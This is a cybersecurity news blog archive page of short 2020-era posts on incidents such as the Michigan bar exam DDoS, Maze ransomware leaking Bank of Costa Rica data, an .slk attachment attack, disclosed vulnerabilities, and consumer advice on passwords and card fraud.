Search This Blog

Showing posts with label Cyber Security. Show all posts

Online Michigan Bar Exam Hit by a Distributed Denial of Service (DDoS) Attack



The recently conducted online Michigan bar exam was briefly taken down as it was hit by a rather "sophisticated" cyberattack. 

The test had been hit by a distributed denial of service (DDoS) attack, which includes a hacker or group endeavoring to bring down a server by overpowering it with traffic according to ExamSoft, one of the three vendors offering the exam that certifies potential attorneys. 

The incident marked the first DDoS attack the organization had encountered at a network level, ExamSoft said, and it worked with the Michigan Board of Law Examiners to give test-takers more time to take the test after it was ready for action once more. 

The company noted that "at no time" was any information compromised, and that it had the option to “thwart the attack, albeit with a minor delay” for test-takers. 

The Michigan Supreme Court tweeted preceding the organization's statement that a "technical glitch" had made the test go down, and those test takers were “emailed passwords and the test day will be extended to allow for the delay for some test takers to access the second module.” 

As per the court, those taking the test with provisions from the Americans with Disabilities Act were not affected by the episode.

 “All exam takers were successfully able to start and complete all modules of the Michigan Bar exam,” the organization wrote. 

“This was a sophisticated attack specifically aimed at the login process for the ExamSoft portal which corresponded with an exam session for the Michigan Bar,” ExamSoft said in a statement on Tuesday. 

United for Diploma Privilege, a national gathering of law students, graduates, professors, and lawyers pushing for the bar exam to be postponed during the COVID-19 pandemic, raised worries about data privacy issues associated with the cyberattack.  

Numerous states have opted to offer the bar exam in-person this month, while others will offer the test online in early October. 

A spokesperson for the National Conference of Bar Examiners (NCBE), which drafts a segment of the test, told 'The Hill' just earlier this month that states and jurisdiction could decide to offer the test through vendors such as ExamSoft, Extegrity and ILG Technologies.


Firefox expected to release a fix for their "Camera active after phone locks" bug this October


A bug in Mozilla Firefox enabled websites to keep the smartphone camera active even after leaving the browser or locking the phone. The company is working on fixing the bug and are planning to release the fix around October this year.


The bug was first reported by Appear TV, a video delivery platform last year in July. The bug activates when a user opens a video streaming app from their Mozilla Firefox browser in their Android smartphone.

It was first noticed by Appear TV when the video kept playing in the background even when it should have stopped that is the video kept playing in the background even when the user moved out of the browser or pushed it to the background or locked the phone. This raised concerns over user's privacy and bandwidth loss. "From our analysis, a website is allowed to retain access to your camera or microphone whilst you're using other apps, or even if the phone is locked," said a privacy app, Traced in talks with ZDNet. "While there are times you might want the microphone or video to keep working in the background, your camera should never record you when your phone is locked".

On Fixing the Issue

 "As is the case with dedicated conferencing apps, we provide a system notification that lets people know when a website within Firefox is accessing the camera or microphone, but recognize that we can do better, especially since this gets hidden when the screen is locked," a Mozilla spokesperson said in a statement.

"This bug [fix] aims to address this by defaulting to audio-only when the screen is locked," Mozilla added. "[The fix] is scheduled for release at the platform-level this October, and for consumers shortly after."

Mozilla has been working on a next-generation browser Firefox Nightly with more focus on privacy to replace their current browser for Android. The update is out for testing.

"Meanwhile, our next-generation browser for Android, now available for testing as Firefox Nightly, already has a prominent notification for when sites access this hardware as well," said Mozilla.

Representatives of the Russian government commented on the statements of Western media about the attack of "Russian Hackers"


The media of the United Kingdom and the United States are working in the interests of the authorities, trying to reduce the intensity of critical sentiment among British and American residents, said Alexander Malkevich, First Deputy Chairman of the Commission on Media of the Public Chamber of the Russian Federation, President of the Foundation for the Protection of National Values.

The Daily Telegraph, New York Times, Financial Times and Metro said that the hacker group ART29, allegedly linked to Russian intelligence services, attacked British research centers working on the creation of a vaccine against COVID-19.

In addition, British Foreign Secretary Dominic Raab said that in December last year, Russian hackers "almost certainly" tried to influence the outcome of the parliamentary elections in Great Britain by circulating "illegally obtained" government documents on the Internet.
London threatened to retaliate at the diplomatic level, without providing any evidence of confirmation about the "Russian hackers".

According to Maria Zakharova, spokesman for the Russian Foreign Ministry, British and American tabloids, and newspapers like the New York Times and the Financial Times, do not need real evidence: anti-Russian publications are published there regularly. Britain did not make any real attempts to understand the situation.

“The British authorities are aware of the Russian National Coordination Center for Computer Incidents, specially created for this purpose. However, we did not receive any calls in connection with these incidents through official channels, ”said an employee of the Russian embassy in London.

Russia's ambassador to the UK, Andrei Kelin, called “meaningless” accusations of attempts to steal data on a coronavirus vaccine by hackers led by Russian intelligence services.  According to him, in the current world, it is impossible to attribute hacker attacks to any country.

Russian experts gave tips on protecting a mobile Bank from fraudsters


Two-factor authentication and compliance with digital hygiene rules can protect users from hacking a mobile Bank on smartphone

According to experts, mobile banking programs are quite secure, so most often funds are stolen due to user errors.

“More often, cybercriminals call customers of financial institutions or use malware,” said Sergei Golovanov, a leading expert at Kaspersky Lab. In this case, users may accidentally give fraudsters the card details and login passwords.

Andrey Arsentiev, head of Analytics and Special Projects at InfoWatch Group, believes that any applications are vulnerable to hacking if malware is installed.

Vladimir Ulyanov, head of the Zecurion analytical center, is sure that users need to configure two-factor authentication to get an additional one-time code. At the same time, the specialist believes that the spyware installed on the smartphone can intercept the SMS code from the Bank. "It is more secure to perform operations and receive confirmation codes on different devices," Ulyanov said.

"Install the software on your phone only from authorized, approved sources (App Store and Google Play)," said Ruslan Suleymanov, Director of information technology at ESET Russia. In his opinion, customers of credit organizations need to have a separate card for online purchases, set daily limits for transfers, and regularly change passwords.

"You can't tell anyone your card details or login details to the customer Bank by telephone. Not a single bank makes such official requests on its behalf,” concluded Suleymanov.
According to the founder of DeviceLock Ashot Hovhannisyan, it is best not to use a mobile Bank, but to log in to your personal account on a computer protected by antivirus. If mobile banking is important, then you should stop using a jailbreak and installing dubious programs through alternative stores.

In addition, Roskachestvo experts have recommended that users should regularly update the software on their devices, even if they do not see a particular need for it. Otherwise, it can lead to unpleasant consequences.

Indian Organizations Suffer the Most in Public Cloud Security Incidents



In a survey of 26 countries for public Cloud security incidents, India emerges as the nation which endured the hardest hits the previous year with 93 percent of the nation's organizations encountering the problem.

The survey included more than 3,500 IT managers across 26 nations in Europe, the Americas, Asia Pacific, the Center East, and Africa that currently host data and workloads at hand in the Public Cloud.

The cybersecurity incidents that Indian organizations suffered most included ransomware (53 percent) and other malware (49 percent), exposed data (49 percent), compromised accounts (48 percent), and cryptojacking (36 percent), said the report titled "The State of Cloud Security 2020" by cybersecurity company Sophos.

While Europeans seem to have endured the least level of security incidents in the Cloud, an indicator that compliance with General Data Protection Regulation (GDPR) guidelines are assisting with protecting organizations from being undermined.

However, India still hasn't enforced a data protection law.

Chester Wisniewski, Principal Research Scientist at Sophos said in a statement, "Ransomware, not surprisingly, is one of the most widely reported cybercrimes in the public Cloud."

 "The recent increase in remote working provides extra motivation to disable Cloud infrastructure that is being relied on more than ever, so it's worrisome that many organizations still don't understand their responsibility in securing Cloud data and workloads," Wisniewski added later.

"Cloud security is a shared responsibility, and organizations need to carefully manage and monitor Cloud environments in order to stay one step ahead of determined attackers."

According to the report, more than 55 percent of Indian organizations and businesses revealed that cybercriminals obtained access through the stolen Cloud provider account credentials.

Regardless of this, only 29 percent said managing access to Cloud accounts is a top area of concern. Albeit 'accidental exposure' keeps on plaguing organizations, with misconfigurations exploited in 44 percent of reported attacks on Indian organizations.

With 76 percent of organizations utilizing the Public Cloud, detection and response are driving the Cloud security concern for IT managers in India while data security still stays as a top concern across the world for organizations.

A gift for a hacker: experts name the easiest passwords to hack



Experts have conducted research and found out an algorithm that can be used to calculate the password to log in to another user's system on the Internet, if the combination they came up with is too simple, and therefore unreliable.

According to the head of the research group of the information security Analytics Department of Positive Technologies, Ekaterina Kilyusheva, it is not difficult for hackers to crack passwords with simple words such as password or qwerty, as well as with personal data of users - name, date of birth and phone numbers. This became clear after the company's experts analyzed the passwords of users of 96% of large companies.

“The results showed that one of the most popular was the password of the format “Month, Year” (in Russian) using English keyboard layout, for example, Ltrf,hm2019 or Fduecn2019. Such passwords were found in every third company, and in one organization they were selected for more than 600 users," said Kilyusheva.

Experts gave a unanimous recommendation not to use default passwords and not to use weak combinations that cybercriminals will start to pick up first. These include sequences of numbers: 12345, dates of birth: 01.01.1990, phone numbers, and simple words like password or qwerty.
Passwords in the format "name + year of birth" and the names of loved ones are also at risk: such data is easy to find in the public domain, for example, in social networks, said Anton Ponomarev, Director of corporate sales at ESET Russia.

"Passwords consisting of a random set of letters, numbers and signs are the most difficult to crack, but, of course, much depends on their length," added the founder of DeviceLock Ashot Hovhannisyan.

Ozon launched a bug bounty on HackerOne


The reward for each bug found will depend on the degree of its impact on the service, the potential damage that the vulnerability can cause, the quality of the report and other factors

Ozon, one of the largest online stores in Russia, has launched its own program to search for vulnerabilities on the well-known site HackerOne. Since this is the first Russian e-Commerce company, it is hoped that it will set the right path for other projects.

To launch the bug bounty program, Ozon first plans to invest $41,800 in working with researchers searching for vulnerabilities in systems.

At the same time, not only Russian cybersecurity experts but also experts from abroad can participate in the online store program.

According to the company, the launch of the program will provide round-the-clock security monitoring, but it will not cancel the work of the Ozon IT laboratory team in ensuring the security of Ozon services but will complement it. Currently, more than 1,000 engineers work in the Ozon IT lab, and 3.5 million users visit the Ozon website and app every day.

"Now the company has the necessary resources not only to develop its own security services but also to work with the hacker community," said Ozon.

Today, not many Russian companies resort to an organized search for vulnerabilities. Among these, it is possible to allocate giants like Yandex, Mail.ru and Qiwi. Ozon became the next major project, as the company had resources not only to develop its own security services but also to interact with the community of ethical hackers.

Like programs of other companies, the bug bounty from Ozon involves a cash reward, the amount of which depends on the severity of the bug found. For example, a company can pay about $240 for an XSS hole.

But something more dangerous, such as an RCE vulnerability that leads to remote code execution, can bring the researcher up to 1,600 dollars.

In May, HackerOne representatives said that the platform had paid researchers a total of $100 million over the entire lifetime of the project. And in early July, the list of the most generous HackerOne participating companies became known.

A New and Amazingly Simple Device in an Era of Pandemics to Protect Your Privacy



A period of pandemics and social distancing sent more people than ever into the work-from-home world. These new realities mean average consumers at home wound up confronted with yet another problem. 

A considerable lot of their household internet setups came up short on the security and protection of bigger workplace setups that incorporate upgraded cybersecurity and firewalls. Here steps in a new and incredibly simple on-hand device to plug those privacy gaps at the source. 

The Firewalla cybersecurity unit hit the market before anyone even realized what a coronavirus was. Nobody could've envisioned how ideal its feature would be. It was initially expected to prevent the 'creep next door' from redirecting the user's Wi-Fi sign or taking advantage of their home security cameras. 

The device is made to shield all devices on the system from cyberattacks and alert the user when anything worrying is to such an extent as endeavored. When the user purchases the unit and assigns out its guard duty, there's no monthly fee. 

The magic device additionally comes with a rather one of a kind feature through which it constructs a personal online firewall, there's the "Family Time Social Hour" ability that totally blocks every single social media platform for each hour in turn. 

Regardless of whether the user needs to compel everybody to complete some work or ground kids in some face-to-face interaction, a world without Twitter or Facebook for an hour is indeed a brilliant place. 

Apart from this addition keeping the user's private messages, documents, and other online behavior behind their home's own readymade firewall, this little blue box empowers monitoring of any minor's Wi-Fi use. 

Parents can likewise utilize Firewalla to keep out unwanted sites and online networking intruders. 

Nonetheless, the devices are pretty simple to set up and ready to improve personal and home-based situated online security in numerous ways, the Firewalla is a sensibly evaluated and viable choice for ensuring online privacy regardless of whether your home hasn't become a base for pandemic-time homebound work. 

The Firewalla Blue comes with 500Mb processing power, while the more affordable Firewalla Red offers 100Mb and sells for $109. As of now, only Firewalla Red is accessible at Amazon. Nonetheless, both the versions remain accessible and in stock at the Firewalla website.


In six months, hackers attacked Russian government systems more than a billion times


Since the beginning of the year, infrastructural digital objects of Russia have undergone cyber-attacks more than a billion times, said the Director of international information security of the Russian Foreign Ministry Andrey Krutskikh in an interview published on June 29 in the journal International Life.

“Since the beginning of this year, more than 1 billion malicious information impacts on the critical information infrastructure of the Russian Federation have been recorded,” said Krutskikh.
According to him, coordinated targeted attacks have become more frequent. Over the past few months, the number of such actions has exceeded 12 thousand, while the objects of state authorities, the credit and financial sector, healthcare, the defense industry, science and education were chosen as the main goal.

"These figures confirm the enormous danger posed by computer attacks, since the attacked objects ensure the daily life of society and the state, and the security of our citizens," stressed the special representative of the President.

According to him, the greatest danger is that incidents in the online space can lead to a full-scale conflict in the offline environment.  Therefore, Krutskikh once again recalled Russia's calls to the world community to cooperate against terrorism in the new digital age. The expert is sure that the use of Information and Communication Technologies (ICT) threatens the sovereignty of States.

"Russia calls for more effective international cooperation in the fight against the threat of terrorism, especially in the digital age. The use of ICT by terrorists is a clear challenge to international peace and security arising from the illegal use of these technologies. This is not just a criminal problem, it is also a political problem. Such actions pose a threat of violating the sovereignty of States and interfering in their internal Affairs," said the diplomat.

Recall that in 2019, Krutskikh stated that the number of cyber attacks is growing, only about 70 million attacks are carried out per year on Russian state structures. The damage from this on a global scale is already measured in trillions of dollars, by 2022 it will reach up to 8 trillion dollars.

Enterprises Improving Their Response to Cybersecurity Incidents, Yet Contributing To Reduce the Effectiveness of Defense


IBM recently released the results of a global survey, which recommended that while investment and planning are on the uptake, adequacy isn't on a similar 'incline', with reaction endeavors hindered by complexity brought about by divided toolsets.

Conducted by the Ponemon Institute, the research highlighted reactions from more than 3,400 security and IT staff across the world.

This research was IBM's fifth annual Cyber Resilient Organization Report, which says that while organizations are improving in cyberattack planning, identification, and response, their capacity to contain a functioning threat has declined by 13%.

By and large, enterprises send 45 cybersecurity-related tools on their networks yet the widespread utilization of an excessive number of tools may add to an inability not only to distinguish, yet additionally to shield from dynamic attacks.

While it creates the impression that the enterprise cybersecurity scene is achieving another degree of development, in any case, with 26% of respondents saying that their organizations have now embraced formal, all-inclusive Cyber Security Incident Response Plans (CSIRPs), there's been an expansion from 18% five years ago.

In total, nonetheless, 74% of respondents said their cybersecurity planning posture despite everything fails to be desired, without any plans, especially ad-hoc plans, or irregularity still a thistle in its IT staff.

Furthermore, among the individuals who have adopted a reaction plan, just a third has made a playbook for basic attack types to keep an eye out for during daily tasks.

"Since different breeds of attack require unique response techniques, having pre-defined playbooks provides organizations with consistent and repeatable action plans for the most common attacks they are likely to face," the report notes.

As indicated by IBM, an absence of planning and response testing can prompt a damages bill up to $1.2 million higher than a cyberattack would have in any case cost a victim company and the expense can be high as far as disruption is concerned.

Thus IBM responded that "With business operations changing rapidly due to an increasingly remote workforce, and new attack techniques constantly being introduced, this data suggests that many businesses are relying on out-dated response plans which don't reflect the current threat and business landscape."

This is all considering the COVID-19 pandemic and the rapid and sudden changes a large number of us have encountered in our workplaces, CSIRP arrangements should be inspected, and if need be, changed to adjust to the working from home environment.

Indians to use VPN as a way to evade ban on Chinese Apps


It seems like people have found a way to circumvent government's ban on 59 Chinese Apps including favorites like TikTok, Share it, Shien, Clash of Kings, and many more and have moved on to use VPN (Virtual Private Network) to access these apps.


Right after the ban announcement by government companies like SatoshiVPNS put an advert on their social media stating, Ann investment in a VPN is an investment that always pays for itself — many times over.” There have been articles on blabberpost and others recommending how and which VPN to use to access the banned applications.

And it's not the first time Indians have turned to VPN to dodge regulations, in fact, we are quite notorious when it comes to VPN. After Reliance Jio, Bharti Airtel and Vodafone Idea - the largest telecom providers in the country- took down porn websites from their network, India fell only three steps from 12 to 15 in terms of visitors to Pornhub. A 2019 report from Pornhub revealed that 91% of Indian users access the site via mobile phone.

 Since February, India has seen a growth of 15% in VPN usage, according to a report by ExpressVPN; the global average stands at 21%. 

By the books, using VPN is not illegal in India for as much as it's not used for any illegal activity. The most common use of a VPN in the country is either to watch pornography or to access torrents and both of these do not summon legal actions.

Since the suspension of Internet service from August 2019 till March 2020 in the Kashmir Valley and the aftermath of weak 2g and 3g networks, many citizens turned to VPN in order to reach blocked content Facebook, Twitter, and other social media sites. The government even arrested some for using VPN to promote unlawful activities.
after the ban, Google and Apple App Store removed TikTok and Helo for Indian users but other banned apps like Browsers, Club Factory, Shein, ShareIT, and Clash of Kings are still listed on both the stores.

Hackers abusing .slk files to attack Microsoft 365 users


Avanan’s Security Analysts have recently discovered a threat bypassing Microsoft 365 security, the attack uses .slk files to avoid detection.


The attack groups send emails containing .slk file as an attachment with macro (MSI exec script) to download and install the trojan. Although this attack is limited to Microsoft 365, bypassing both of its default security (EOP) and advanced security (ATP), it does put around 200 million-plus users in jeopardy.

 By far Gmail users are safe from this threat as Google blocks .slk files and does not allow to be sent as an attachment.

The attack

“Symbolic Link” (SLK) file is an older human-readable text-based spreadsheet format last updated in 1986. Back when XLS files were private, .slk were open-format alternative for XLS but then XLSX was introduced in 2007 and there was no longer the need of .slk. Now, to the user, these .slk files look similar to an Excellent document and let the attacker move through Microsoft 365 security.

This latest discovery by Avanan’s Security Analysts reveals that these files when installed run a command on the Windows machine. It drives Windows Installer to install any MSI package quietly. This particular attack installs a hacked version of the off-the-shelf NetSupport remote control application giving the attacker full control of the desktop.

Where did the mails come from? 

The majority of the malicious emails were sent from a disposable email address like, “randomwords1982@hotmail.com”.

These mails were sent from Hotmail and for a good reason, "While most of the well-known anonymous email sending engines deserve their poor spam and phishing reputations, Hotmail users benefit from Microsoft’s own reputation. Since the service was merged with its own Outlook application, Microsoft seems to grant them a higher level of trust than external senders", reports Informationsecuritybuzz.com.

 The peculiar thing about these emails is that they are manually created and targeted personally. No two mails are alike, each one with a different subject and body especially crafted for the receiver with the subject and matter that concerns them.

How to prevent the attack?

The best method to avoid this attack is to simply configure your Office 365 to reject files with .slk extension at least till Microsoft fixes the issue.

Bharti Airtel on cyber high alert - upgrades security measures


New Delhi: Bharti Airtel, India's major telecom service provider has upgraded it's cyber security to a higher threat level for the next week in the aftermath of various cyber attacks.


They have increased their SOC (System On Chip) to withstand upcoming attacks and are working on eliminating any vulnerability that could welcome an attack.

  "We have come across media reports on the potential surge in cyber-attacks such as DDoS, Malware attacks, and defacement of websites. We have also witnessed an increase in such Cyber activity during our security operations. These attacks threaten to not only disrupt critical business operations but also impact your brand’s reputation," Airtel said in communication with their many enterprises.

  Airtel that associates and work with half a million small-medium enterprises and 2000 large enterprises has communicated the security concern and requested them to take preventive measures as well.

And Airtel is not wrong in estimating the risk; CERT-In, cybersecurity agency warned of probable large scale phishing attacks.

  The odds are against Airtel as the current vista is not looking very hopeful against a massive cyber attack. Most of the employees are still working from home, lack of security training and a plethora of attacks has forced the organization into strengthening its cybersecurity.

  "Airtel has urged its customers to take proactive measures such as continuous monitoring of network traffic for all channels, which include email, the internet, and others. It has also asked enterprise customers to enable geo-location monitoring for traffic coming from neighboring countries", reports Cisco, Economic Times.
The company has put an advisory to its costumers and enterprises to upgrade all softwares and patches available and strengthen server and application infrastructure. The telecom operator has advised employees to install proper security measures like anti-virus and update patches as well as to be careful of phishing attacks.

Know ways to avoid credit or debit card frauds


Since 2016, when India decided to go cashless the growth of online payments increased exponentially but not without risks. Online payments seem quick and easy but it's not hard for your financial data to be stolen. With every transaction and swipe you're putting your credit to risk.


In 2019, India faced a banking hazard as 32 lakh debit cards from 19 banks, including HDFC Bank, ICICI Bank, and Axis Bank, were compromised with a loss of 1.3 crores. The cyber-world is littered with examples like this, people often think it's inevitable that they will be duped at least once, that even if they are careful their credit cards will be compromised at some point. But it doesn't have to be so, with the following measures we can reduce the risk of debit and credit frauds to a great extent.

Register for alerts

The best way to prevent a bogus transaction is to set up email or SMS alerts, as they will at least give you a warning as to when a transaction is made or tried. And if the said transaction is not by you then you can take action immediately.

Don't save your card information on websites

It's not foolproof but it would certainly clog some loopholes. It's better to limit the sites where you save your card details and know all the sites you have them saved on. Best to save them on trustable sites.

Be careful

The Internet is full of baits so be prudent while clicking on any too-good-to-be-true deals. Especially the ones that ask for your card details. Be paranoid of fishy email links and consider them as red flags.

Log out

Its cautious to log out of sites and apps made for e-commerce and never save any passwords on your phone.

Check Statements Regularly

Check your bank statements for any suspicious activity, so you can catch one early on. Sometimes, the fraudsters might use the card multiple times so as soon as you find something suspicious report it and cancel the card via the bank.

Use Online Wallets and UPI

As online wallets and UPI doesn't disclose your account details or card details, it's better to use them instead of credit or debit cards for e-commerce.

 It goes without saying that always air on the side of caution and never disclose your financial details to anyone. With a few careful steps you can reduce the risk of falling into a debit fraud and even if you do many banks offer insurance for such cases, so go through the bank's policies thoroughly; they may save you a dime a dozen.

Expert: the image of a "Russian hacker" has become a means of information warfare with the Russian Federation


Experts commented on the release of the report of independent public organizations "Information fight against Russia: constructing the image of the enemy".

The director of the Center for Political Information, Alexei Mukhin, noted that the report analyzed how the image of the "Russian hacker" works. According to him, this image is replicated much less through the media than through social networks.

The image of a "Russian hacker", as Mukhin said, is mainly distributed via Twitter using similar hashtags, such as #Russianhacker. This is done to attract attention, to redirect the user to materials that demonstrate "horror and lawlessness".

This forms a "public opinion", with which not only politicians but also the military are already working. This is bad, because, in their hands, the information struggle turns into a hybrid war.

In different years, according to this scheme, Russia was accused of various outrages. In 2014, in the participation in the war in the Donbass, in 2016, in interference in the American elections.

It is characteristic that as soon as Russia requires to show evidence, it turns out that they are not.
Anna Shafran, a TV and radio host, believes that an open information war has already begun. 

According to her, recently, YouTube blocked without warning or explanation three popular Russian resources, including the TV company "Crimea-24". The Russian Foreign Ministry, of course, protested and rightly qualified the incident as an attack on Russian-language resources from the American Internet platform.

Sergei Sudakov, a Professor at the Military Academy of Sciences, said that the meme "Russian mafia" was created in the interests of the United States in the 1990s. It is outdated, replaced by a new meme "Russian hacker". It is fashionable to present Russia as an international information terrorist.
It is worth noting that in the Russian sector of the Internet, the meme “Russian hackers” is perceived approximately as “British scientists”. At the same time, in the foreign segment, the concept of "Russian hackers" is linked to such concepts as danger, interference, and more recently, incitement to riot.

The First Ransomware Attack and the Ripples It Sent Forward In Time


What was once a simple piece of malware discovered just 20 years ago this month exhibited its capacity which transformed the entire universe of cyber-security that we know of today?

Initially expected to just harvest the passwords of a couple of local internet providers, the malware, dubbed as 'LoveBug' spread far and wide, infecting more than 45 million devices to turn into the first piece of malware to truly take businesses offline.

LoveBug was the shift of malware from a constrained exposure to mass demolition. 45 million compromised devices daily could rise to 45 million daily payments.

Be that as it may, eleven years before anybody had known about LoveBug, the IT industry saw the first-ever main case of ransomware, as AIDS Trojan. AIDS Trojan which spread through infected floppy disks sent to HIV specialists as a feature of a knowledge-sharing activity.

The 'lovechild' of LoveBug and AIDS Trojan was the ransomware that followed, with GPCoder and Archievus hitting organizations around the globe through which the hackers additionally bridled ecommerce sites to discover better ways to receive payments.

The protection industry responded by taking necessary steps with 'good actors' cooperating to decipher the encryption code on which Archievus depended, and sharing it broadly to assist victim with abstaining from paying any ransom.

From that point forward the 'cat and mouse' game has proceeded with viruses like CryptoLocker, CryptoDefense, and CryptoLocker2.0 constructing new attack strategies, and the protection industry executing new defenses. Presently ransomware has become increasingly sophisticated and progressively prevalent as targets today are more averse to be individuals since large businesses can pay enormous sums of cash.

And yet, data protection has become progressively sophisticated as well, with certain four areas that should now be a part of each business' ransomware strategy: protect, detect, respond, and recover. Social engineering and phishing are also presently becoming progressively central to the success of a ransomware attack.

The LoveBug was effective in a scattergun fashion, yet at the same time depended on social engineering.

Had individuals been less disposed to open an email with the subject line ‘I love you', the spread of the malware would have been 'far more limited'.

Nevertheless, the users presently ought to be more alert of the increasingly diverse threats in light of the fact that inexorably, hackers are expanding their threats data exfiltration or public exposure on the off chance that they feel that leaking data may be progressively 'persuasive' for their targets.

Thus so as to react to the issue, it's essential to have backup copies of data and to comprehend the nature and estimation of the information that may have been undermined in any way.

A Series Of Cyber Essentials Toolkits Released To Address Cyber-Security Risks


As a major starting point for small businesses and government agencies to comprehend and address cybersecurity risk as they indulge with other risks, Cyber Essentials, the Cybersecurity and Infrastructure Security Agency (CISA) released the first in a series of six Cyber Essential Toolkits following its own November 2019 release.

CISA's toolkits will give greater detail, insight, and assets on every one of the Cyber Essential' six "Essential Elements" of a Culture of Cyber Readiness.

The launch of the introductory "Essential Element: Yourself, The Leader" will be followed every month by another toolkit to compare with every one of the six "Essential Elements." Toolkit 1 targets on the role of leadership in fashioning a culture of cyber readiness in their organization with an accentuation on methodology and investment.

CISA Director Christopher Krebs says “We thank all of our partners in government and the private sector who played an essential role in the development of CISA’s Cyber Essentials Toolkit. We hope this toolkit and the ones we are developing, fills gaps, and provides executives the tools they need to raise the cybersecurity baseline of their teams and the organizations they lead.”

Cyber Essential created in collaboration with small businesses and state and local governments, plans to prepare smaller organizations that generally have not been a part of the national dialogue on cybersecurity with basic steps and assets to improve their cybersecurity.

The CISA incorporates two sections, the core values for leaders to build up a culture of security, and explicit activities for them and their IT experts to put that culture into action. Every one of the six Cyber Essential incorporates a list of noteworthy items anybody can take to bring down cyber risks.

These are:

  •  Drive cybersecurity strategy, investment, and culture; 
  •  Develop a heightened level of security awareness and vigilance;
  •  Protect critical assets and applications; 
  •  Ensure only those who belong on your digital workplace have access; 
  •  Make backups and avoid loss of info critical to operations; 
  • Limit damage and restore normal operations quickly.

Several Vulnerabilities Identified In Emerson OpenEnterprise


Recently four vulnerabilities were found in Emerson OpenEnterprise and were accounted for to the vendor in December 2019 with the patches released a couple of months later.

Roman Lozko, a researcher at Kaspersky's ICS CERT unit, was responsible for the identification of the flaws, and the security holes found by him have been depicted as 'heap-based cushion buffer, missing authentication, improper ownership management, and weak encryption issues.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and Kaspersky published advisories for three of the vulnerabilities a week ago. The rest of the vulnerability was described by Kaspersky in a previous advisory.

As indicated by Emerson, OpenEnterprise is explicitly intended to address the prerequisites of associations focusing on oil and gas production, transmission, and distribution.

The initial two followed as CVE-2020-6970 and CVE-2020-10640 are depicted as critical, as they can allow an attacker to remotely execute discretionary code with 'elevated privileges' on devices running OpenEnterprise.

Vladimir Dashchenko, a security expert at Kaspersky, says an attacker could misuse these vulnerabilities either from the system or directly from the internet. Notwithstanding, there don't give off an impression of being any occurrences of the affected product exposed to the internet.

“The most critical vulnerabilities allow remote attackers to execute any command on a computer with OpenEnterprise on it with system privileges, so this might lead to any possible consequences,”

 “Based on Shodan statistics, currently there are no directly exposed OpenEnterprise SCADA systems available,” Dashchenko explained. “It means that asset owners with installed OpenEnterprise are definitely following the basic security principles for industrial control systems.”

The rest of the vulnerabilities can be exploited to 'escalate privileges' and to acquire passwords for OpenEnterprise user accounts, yet exploitation in the two cases requires local access to the targeted system.

Maze Ransomware Operators Leaked 2GB of Financial Data from Bank of Costa Rica (BCR)


Bank of Costa Rica (BCR) has been receiving threats from the threat actors behind Maze ransomware who have stolen credit card details from the bank, the ransomware gang started publishing the encrypted financial details this week.

The Banco de Costa Rica is one of the strongest state-owned commercial banks operated in Costa Rica, starting from humble origins of mainly being a private commercial bank, it expanded to become a currency issuer and one of the most renowned baking firms in Central America contributing largely in the financial development of the nation.

The hacker group behind the data leak have demanded a ransom from Banco de Costa Rica at various occasions, however, to their dismay they observed a lack of seriousness in the way the bank dealt with these previous leaks and it served as a primary reason that motivated the latest data leak, according to an interview with Maze ransomware operators.

As per the claims made by the attackers, Banco de Costa Rica's network remained insecure till February 2020; it was in August 2019 when they first compromised the bank's network and the second attempt was made in the month of February 2020 to see how the security has been improvised – if at all so.

The 2GB of data published by the Maze ransomware attackers on their leak site contains the details of at least 50 Mastercards and Visa credit cards or debit cards, a few being listed more than once.

As per the statements given by Brett Callow, a threat analyst with Emsisoft to ISMG, "Like other groups, Maze now weaponizes the data it steals,"

"The information is no longer simply published online; it's used to harm companies' reputations and attack their business partners and customers."

"The Maze group is a for-profit criminal enterprise who are out to make a buck," Callow says. "The credit card information has been posted for one of two reasons: Either to pressure BCR into paying and/or to demonstrate the consequences of non-compliance to their future victims," Callow further told.

Russian experts assessed the level of protection of corporate data from hacker attacks


Even a low-skilled hacker can hack the internal network of global companies. An experienced attacker will not need more than half an hour to penetrate the local network. Such conclusions were made by experts from Positive Technologies in their research.

"It took an average of four days to penetrate the local network, and at least 30 minutes. In most cases, the complexity of the attack was estimated as low, that is, a low-skilled hacker who possesses only basic skills could also carry it out," said experts.

Positive Technologies experts analyzed information dated 2019 on the protection of corporate information systems of 28 companies from external intruders and pentest (the penetration test). As part of external pentests, specialists managed to penetrate the local networks of 93% of organizations. In some cases, there were several ways to overcome network protection.

According to experts, every sixth company showed signs of hacker attacks, malicious links on official sites or valid accounts in public leak databases. Based on this, the researchers concluded that the company's IT infrastructure could be controlled by hackers.

Specialists advise companies for protection, first, to follow the General principles of information security: regularly check their information resources available for external connection, as well as develop strict rules for corporate password policy and monitor their implementation. In addition, they recommend regularly updating the security settings for operating systems and installing the latest versions of software products.

Recall that, according to Kaspersky Lab, in April, the number of attacks on the infrastructure of Russian organizations whose employees work remotely exceeded 18 million, which is five times more than in February. Positive Technologies found that up to 48% of the passwords of employees of organizations is made up of a combination of a word indicating the time of the year or month and four digits indicating the year.